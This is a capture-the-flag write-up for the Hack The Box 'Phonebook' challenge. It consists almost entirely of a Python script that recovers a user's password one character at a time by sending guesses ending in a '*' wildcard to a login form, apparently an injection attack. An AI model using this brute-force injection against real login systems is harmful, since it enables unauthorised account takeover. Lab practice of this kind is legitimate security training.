https://app.hackthebox.com/challenges/153

Description

Who is lucky enough to be included in the phonebook?

Exploitation

#!/usr/bin/python3
import requests,sys

if len(sys.argv) < 2:
    print("Usage: python script.py <url>")
    sys.exit(1)
username = "reese"
login_url = f"http://{sys.argv[1]}/login"
characters = "qwertyuiopQWERTYUIOPasdfghjklASDFGHJKLzxcvbnmZXCVBNM_-[]}{1234567890"

def create_session():
    return requests.Session()

def try_login(user, pw, session):
    headers = {
        'X-Forwarded-For': pw,
        'Referer': login_url
    }
    data = {
        "username": user,
        "password": pw
    }
    response = session.post(login_url, headers=headers, data=data, allow_redirects=False)
    return 'location' not in response.headers or '/login' not in response.headers.get('location', '')

def force_one(prefix, session):
    for x in characters:
        if try_login(username, prefix + x + "*", session):
            return x
    return ''

def forcer():
    got = ""
    session = create_session()
    while True:
        next_char = force_one(got, session)
        if not next_char:
            break
        got += next_char
        print(got)

forcer()

Summary

Phonebook: identify the broken request handling, prove control, and use it to recover the flag.